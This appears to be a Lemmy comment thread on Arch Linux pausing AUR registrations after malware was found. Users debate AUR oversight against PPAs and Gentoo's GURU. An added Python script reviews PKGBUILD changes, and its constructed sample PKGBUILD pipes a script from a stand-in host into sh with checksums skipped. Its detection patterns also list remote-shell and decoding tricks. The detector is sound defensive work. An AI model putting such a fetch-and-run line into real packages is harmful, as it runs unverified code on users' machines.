Arch Linux Blocks New AUR Registrations Amid Malware Cleanup
1d 19h ago by lemy.lol/u/cm0002 in linux@programming.dev from linuxiac.com
Yeah, they’re gonna have to change some policy. The 2-week ownership change for orphaned packages is just an obvious exploit now, but I’m sure more exist.
They should straight up take it down. This is affecting their distro's and Linux's reputation.
I respect your opinion here, but they will absolutely not shut down the AUR since it's the reason anyone uses Arch. Just like how piefed.ca doesn't shut down just because a few users upload illegal things.
Is there more context on the piefed.ca thing?
It's a hypothetical assumption created by me. I should have said lemmy.world since I'm 100% sure there have been users that have uploaded illegal content.
No, it just happened to be my instance.
As a side note, for some reason, I can't see any comments inside any post on this community. That's why I have to reply through my lemmy.ca alternate account.
It's a USER repository, where you literally download install files from unverified strangers.
There's a reason all the AUR helpers prompt you to verify all the files before they will build or install anything.
I wonder what percentage of Arch users are actually capable of verifying that an AUR package is safe to install. I doubt that the number is very high, especially with the growing popularity of the distro.
These days it's very small. Most people just wanna use Arch because it's cool.
While I do wholeheartedly think it's by far the best distro, I also frequently recommend Mint for newbies if they don't enjoy learning on their own.
In my case you can unironically blame Valve. I wanted an Arch-based distro to stay as close to SteamOS as possible but I have an nvidia GPU for the foreseeable future (unless I win the lottery or something).
Try CachyOS or just do like me and use their repo + kernel on Arch
Oh yeah that's what I'm using. Thanks though!
This! 👆
It’s still hosted on archlinux.org.
However “YMMV” the scripts are intended to be, they can’t host throngs of malware on their domain.
…Well, I guess they could if they want to become the next npm, but it still seems like a legal liability.
I’m not saying it should be taken down, but the status quo is definitely no longer acceptable.
The entire philosophy of Arch is to put the user in control. The PKGBUILD format is plain-text and reviewable. The documented best practice has always been to read the PKGBUILD and the .install files before building.
I'm not saying they shouldn't look into measures to make it less prone to such attacks, but "take it down" is a very stupid take. If people can't deal with the existence of AUR, there's plenty of different distros to choose already.
In control of installing malware?
I get what you mean, but people are stupid. There needs to be guardrails to prevent these things from happening. That's why the AUR is a bad idea and it should be shut down.
You want your software to be available for a distro? Go through the proper channels. Submit it for review and get it approved. If you stop maintaining it, they remove it. Plain and simple.
That's why you don't have this problem with other distros. Arch made it too easy to download and install unverified, untested, potentially malicious software through the AUR and now every idiot that thinks they know what they're doing is infecting their systems.
There is some software that I only have because of the AUR. For example, Brother printer drivers.
AUR is a great option to have. It doesn't mean people should use it for everything, when there's a perfectly capable version of the same software downloadable from Arch, Flathub or even through Distrobox.
Having options is a good thing, people just need to take care.
In fact, downloading something from AUR without checking it is hardly more dangerous than adding PPAs in Ubuntu.
Hahahahaha they also come in Debian .deb and Fedora .rpm packages. That's why I never got this problem with my hardware on Ubuntu or Debian.
And no it's not the same as PPAs.
Hahahahaha they also come in Debian .deb and Fedora .rpm packages. That’s why I never got this problem with my hardware on Ubuntu or Debian.
That is exactly why the AUR exists. To repackage that vendor's .deb into something Arch can safely manage. This makes Arch's support for 3rd party apps almost unbeatable.
And you’re right: PPAs are not the same… in this regard they’re actually worse. AUR is at least in plain text and the documentation is clear: always check the PKGBUILD. When you add PPAs you’re blindly trusting a 3rd party repository and updating them with sudo.
You can’t burn the whole thing down just because, in your own words, “people are stupid”. They either read the documentation and follow the security policies, or they stick with Arch and Flathub. Or, they can simply choose a different distro. It’s that simple.
The thing is, I agree that AUR could have some sort of protection, such as rate-limiting or a reputation system. But even as is, AUR is still an excellent feature that should definitely be maintained. And people, especially those using Linux, definitely should educate themselves instead of exclusively relying on strangers for all their digital security.
Edited for extra clarification.
You completely missed the point.
Debian or Fedora don't need an AUR because vendors provide the packages themselves. And you know where they're coming from. You have the largest collection of software packages available, plus the 3rd party official packages available to download.
As for the PPAs, they're often provided by the software distributor themselves. Like Proton, or Wine. Most of the time you know who's providing the PPA. Ubuntu also keeps a close watch over these and will act if a malicious PPA is found. It won't take a lot of time before the PPA is taken down to prevent the spread. So it's relatively safer than a free-for-all repo where everybody is contributing and unmaintained packages get taken over. So, no. PPAs are not more dangerous than AUR.
I didn't.
Saying that Debian and Fedora don't need an AUR because vendors provide packages, implying these distros are practically immune to third-party malware, is totally false. Fedora has COPR, openSUSE has OBS, and Ubuntu/Debian rely heavily on PPAs and random deb downloads from websites. See xz-utils: https://en.wikipedia.org/wiki/XZ_Utils_backdoor
Most FOSS developers do NOT have the time or infrastructure to package for every distro. They provide source code on GitHub. The AUR exists to translate that source (or a vendor's deb) into a native Arch package. Furthermore, downloading a random deb from a vendor's obscure website and installing it with dpkg (which runs pre-install scripts as root) is arguably less safe than a PKGBUILD that downloads the exact same binary from the vendor's official mirror, unpacks it, and lets you read exactly what it does before you run it.
Your conception of PPAs is riddled with misconceptions. Absolutely anyone can create a PPA. Canonical does not verify the identity of the uploader beyond email confirmation. Launchpad is flooded with unofficial, community-maintained PPAs that are no more "official" than an AUR maintainer.
Also, Ubuntu does NOT proactively audit the source code or binaries inside PPAs. They take a PPA down after it has been reported and confirmed malicious, exactly the same as the Arch maintainers do with the AUR.
A PKGBUILD is a plain-text shell script. You can read the exact source URL, the compilation flags, and the install commands. A PPA provides a pre-compiled binary file. You have pretty much zero idea what is inside that binary. Blindly giving sudo access to a binary PPA is objectively more dangerous than auditing a 20-line bash script that compiles source code before running.
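The review practice this comment and the earlier one describe (read the PKGBUILD, and read the diff of what you are about to execute when a package changes hands) can be partly mechanised. The script below is an added example written for this page, not code from the thread, the AUR or any AUR helper. Both PKGBUILDs in it are constructed samples (the `example-tool` package and the `files.invalid` host are made up), and the list of patterns it flags is an assumed starting set, not a complete rule set: it diffs the old and new PKGBUILD, scans only the added lines, checks that every `source` host matches the declared upstream `url`, and reports checksums set to `SKIP`.

```python
"""Review helper for an AUR PKGBUILD update: diff the old and new file, then
check the added lines and the new source/checksum arrays for things a
reviewer would want to look at before building. Constructed samples only."""
import difflib
import re
from urllib.parse import urlparse

# Constructed sample: the PKGBUILD as published by the previous maintainer.
OLD_PKGBUILD = """\
pkgname=example-tool
pkgver=1.4.0
pkgrel=1
url="https://example.org/example-tool"
source=("https://example.org/releases/example-tool-1.4.0.tar.gz")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

package() {
  cd "$srcdir/example-tool-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
"""

# Constructed sample: the same package after an ownership change. Checksum
# verification has been disabled and packaging now runs a remote script.
NEW_PKGBUILD = """\
pkgname=example-tool
pkgver=1.4.0
pkgrel=2
url="https://example.org/example-tool"
source=("https://example.org/releases/example-tool-1.4.0.tar.gz"
        "https://files.invalid/helper.sh")
sha256sums=('SKIP'
            'SKIP')

package() {
  cd "$srcdir/example-tool-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  curl -s https://files.invalid/setup.sh | sh
}
"""

# Assumed starting set of patterns worth a second look in *added* lines.
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "remote script piped into a shell"),
    (r"\bbase64\b.*(-d|--decode)", "base64-decoded payload"),
    (r"\beval\b", "eval of a constructed command"),
    (r"\$HOME/\.|~/\.", "writes under user dotfiles"),
    (r"systemctl\b.*--user|/\.config/systemd/user", "installs a user systemd unit"),
]


def bash_array(text, name):
    """Return the elements of a bash array assignment name=( ... ), handling
    the quoted multi-line form PKGBUILDs normally use."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    if not m:
        return []
    tokens = re.findall(r"""'([^']*)'|"([^"]*)"|([^\s'"]+)""", m.group(1))
    return [a or b or c for a, b, c in tokens]


def added_lines(old, new):
    """Lines present in the new PKGBUILD but not in the old one."""
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def review(old, new):
    """Return a list of human-readable findings for the old -> new change."""
    findings = []
    for line in added_lines(old, new):
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append(f"{why}: {line.strip()}")

    # Every source host should match the upstream url= the PKGBUILD declares.
    url_m = re.search(r'^url="?([^"\n]+)"?', new, re.M)
    upstream = urlparse(url_m.group(1)).hostname if url_m else None
    sources = bash_array(new, "source")
    for src in sources:
        target = src.split("::", 1)[1] if "::" in src else src  # name::url form
        host = urlparse(target).hostname
        if host and upstream and host != upstream:
            findings.append(f"source host {host} differs from upstream {upstream}: {src}")

    # SKIP disables makepkg's integrity check for that source entirely.
    sums = bash_array(new, "sha256sums")
    skipped = sum(1 for s in sums if s == "SKIP")
    if skipped:
        findings.append(f"{skipped} of {len(sums)} checksums set to SKIP")
    return findings


if __name__ == "__main__":
    for f in review(OLD_PKGBUILD, NEW_PKGBUILD):
        print("REVIEW:", f)
```

Running it on the two samples reports the piped shell, the second source host, and the disabled checksums; running it with the old file on both sides reports nothing. It is a reviewer's aid, not a verdict: a clean report only means none of the assumed patterns matched, so the PKGBUILD and any .install file still need to be read in full.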
Arch Linux is a versatile, and simple distribution designed to fit the needs of the competent Linux® user.
Versatile, sure.
But Arch is anything but simple. The proof is the number of Arch spinoffs that were made to make it easier to install and use.
And any distro can be for competent Linux users. I mean, Linus Torvalds uses Fedora. I don't think there's a more competent user than him.
There's conceptual simplicity and there's UX. Arch is mostly the former.
Arch USER Repository. Use the official repositories if it's a concern.
AUR is not unique in being a user repository, but it seems somewhat unique in having basically zero oversight. Which is a bad idea for reasons that should be painfully obvious by now.
For comparison, Gentoo's GURU repository allows everyone to submit packages, but limits the ability to accept these submissions to a subset of trusted users.
All community projects are open contribution. Most non-community ones too. You know, almost the whole point of open-source!
But that's not the same as "user repo", which is a wild west concept on purpose.
GURU bills itself as an official repository that's user-maintained. AUR makes no claims of being official as far as I can see from their website.
The AUR domain is aur.archlinux.org and it is linked from the menu-bar on archlinux.org. If AUR is not official, then Arch sure is sending mixed signals to its users.
With a nice, big disclaimer.

Which is not much different from the disclaimer about GURU, though GURU does a much better job at explaining the risks involved in using it:
Disclaimer
Please note that the GURU project is maintained and reviewed entirely by Gentoo users. It is only subject to minimal supervision from individual Gentoo developers, and is not supported by projects such as Gentoo Security. While our Trusted Contributors do their best to keep GURU safe, it is possible for it to contain vulnerable, badly broken or even malicious software. You are using it on your own responsibility.
Anyone infected is at their own fault. Literally every single resource and official statement is "read the diff of what you execute", which would prevent 100% of the attacks.
I'd rather not get cut off from my regular updates for some idiots who can't read or think rules don't apply to them. And yes, people who don't understand the PKGBUILD format shouldn't use the AUR on their own.
100%
But this is the problem. It's like if Microsoft provided Windows with Limewire as a solution to download software. There's bound to be people who are going to exploit it for malicious reasons, and there's bound to be idiots who are going to fall for it. Heck, there's the possibility that even someone who knows what they're doing might also get caught at some point.
It's dangerous and irresponsible.
Arch doesn't come with the AUR "installed". The AUR is a repository of user scripts that exists on the internet. The user chooses to download the scripts, or install an AUR helper to download them automatically. There aren't even AUR helpers in the official Arch repos, so you need to go out of your way to install them.
Let's not take one out of Apple's playbook and limit what a user can do for "their own safety" and because most people "don't know what's best for them".
You kind of have to have guardrails though. Especially with the recent migration from Windows 11 to Linux, a lot of gamers, mostly younger and/or inexperienced users, are being recommended Arch via CachyOS. And a lot of the advice they get involves enabling the AUR and getting their required software from there. Some of the troubleshooting documentation also provides instructions using the AUR. It may not come with Arch, but it sounds to me like it's pretty indispensable.
On the other hand, you have people saying that Arch isn't for new users. That you have to be careful when using AUR and how dangerous it is. You have to know what you're doing.
So then why is it recommended so much? I feel like every other comment when people are asking questions on which Linux flavour to use, the answer is always "just use Arch/just use X variant of Arch". And when I talk about using another distro like Debian, people on Linux communities get really critical and ask "this distro sucks, why don't you just use Arch/Cachy/X variant?"
So which is it? Is it for everyone or not? Is it safe to use or not? Should anybody be using it or not?
The comments are really conflicting with each other here.
And honestly if we're going to recommend Arch/Cachy/Whatever to new Linux adopters, there ought to be guardrails. Or don't recommend Arch. And DON'T recommend using AUR. Try other workarounds instead of taking the easy AUR solution. You don't simply give a loaded gun to someone who wants to do target practice without any precautions or anything to prevent them from hurting themselves or others. Maybe recommend an airsoft gun with some eye-protection goggles instead for target practice initially and let them learn the basics of firearm manipulation using that before moving on to the real deal.
The AUR is not indispensable for Arch, and it is not recommended. The Arch Wiki itself says so, and it even recommends against AUR helpers, because it makes the AUR feel like any other official repo. Some Arch based distros do include AUR helpers by default, and that's on them.
Arch isn't even that recommended, and it's only mentioned above other distros in the gaming sphere because it usually has the freshest drivers and innovations due to being bleeding edge. It is also easy to install and easy to use, and for almost any issue you can consult the Arch Wiki or the Arch Forums.
Either way, we should never limit user freedom in the name of making it "safer" for any user, and we shouldn't be installing guardrails that limit what you can do with your OS. That's the difference between Windows/Mac and Linux. Linux allows freedom, while the others limit it. The "guardrails" are already there, in the Arch Wiki, as a pretty visible warning. If a user doesn't read the recommendations from the official wiki, that's on them.
As an aside, your gun analogy is not valid. A gun is a dangerous tool with which a user can hurt themselves, but also other people. Allowing freedom on a Linux distro is just a way of allowing the user to shoot themselves in the foot (like it has always been possible, one way or another, in every Linux distro). But it doesn't allow the user to hurt others. Let's not do these comparisons.
Peak Linux nerd shit.
People just want their updates to work and you're out here screeching that users are holding it wrong and to read a bunch of diffs 🤣
That's like saying "i just want to bungee jump off this bridge" when the bridge is 10m above active traffic.
This piece of infrastructure is not designed to work this way. It's made for Linux nerds. Not unknowing users. And I don't see why the AUR should punish the former because the latter are ignorant. So either be able to understand and actively read the things you're running or just don't.
That is some gatekeeping bullshit right there.
How is that gatekeeping?
No, it's actual reality. There are more than a hundred thousand packages in the AUR. There are explicit warnings that these are user content and should be used with care.
And now a minuscule percentage (~1%) of orphaned packages, so those with very little interest in them, are taken over by some malicious actors to spread malware.
And people suddenly pretend like this is a catastrophe for Linux (no one cares) and for Arch and its derivatives (who don't operate the AUR by definition and explicitly warn against using it without caution). If I told you that not 1, but 10% of the most obscure software packages you can download and install on Windows are pure malware, you wouldn't even blink an eye. And yet all the morons now come crawling from their caves flooding everything with memes and bullshit of "haha, now we know you lied to us and Linux isn't secure at all!".
I think we should be proud. Linux is finally large enough to at least sort of get "hit" by a malware campaign, and it demonstrates the ease with which thousands of infected packages can be cleaned, because they are centralized to a few repositories. M$'s only bet would be to update Defender's index and cross fingers that the signature doesn't change.
Windows malware is always way out of control of M$, while that's also the norm of uninfected programs.
Almost all Linux programs are by design installed from a central repo.
Yeah, I've seen those warnings, and you make a great argument! In practice generally no one was checking those packages because then the AUR becomes less convenient than building from source (and the AUR is a bonus for using Arch). It's like saying 'all eyes on code' when time and time again relatively no one is actually auditing and everyone just assumes the myths and lies are right.
There are plenty of other distros users can choose from, if they don't want to deal with that. But picking one that is designed for advanced "nerdy" users and then ignoring those explicit warnings is just pure negligence.
Well then stop recommending Arch or CachyOS to every new user that comes in here looking for a gaming Linux distro ffs.
Well, I don't. I'm fully aware of the footguns Arch based distros contain. I generally recommend Mint for Linux beginners. If the person is tech savvy and needs something for their gaming rig, then I might mention Bazzite.
No no, they're right. This is Arch Linux, people demonstrably do not 'just' want their updates to work.
Peak Linux nerd shit.
Next thing you're gonna tell me you eat random shit found on the road and it's nerd bullshit to check if it's safe or not.
LOL!
All these Arch fanboys just can't accept ANY criticism of their favourite Linux flavour. "IT'S THE BEST OKAY? EVERYBODY SAYS SO! IT'S THE BEST BECAUSE IT'S HARD TO USE AND ALL THE SOFTWARE IS BLEEDING EDGE AND MY SYSTEM BREAKS HALF THE TIME I DO AN UPDATE BUT THAT'S NORMAL LINUX SHIT OKAY? AND I USE THE AUR BECAUSE I KNOW WHAT I'M DOING EVEN THOUGH MY SYSTEM IS INFECTED OKAY?"
Yeah. The ArchLinux corporation must be losing money left and right because of this.
Are they stupid?!